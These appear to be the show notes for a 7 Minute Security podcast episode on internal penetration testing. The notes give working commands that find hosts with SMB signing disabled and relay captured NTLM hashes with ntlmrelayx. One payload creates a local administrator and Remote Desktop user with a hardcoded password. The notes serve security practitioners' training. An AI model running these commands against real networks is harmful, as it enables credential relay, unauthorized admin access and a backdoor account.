7MS #372: Tales of Internal Pentest Pwnage - Part 5 - a podcast by Brian Johnson
from 2019-07-15T22:51:08
::
::
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute
Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:
- Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt
Source: Pwning internal networks automagically
- Ready to pass captured hashes from one host to another? Open
responder.conf
and turnSMB
andHTTP
toOff
, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to usentlmrelayx.py -tf targets.txt
where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a-c
to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add
So the full command would be:
ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'
Check today's show notes at https://7ms.us for more information!
Further episodes of 7 Minute Security
Further podcasts by Brian Johnson
Website of Brian Johnson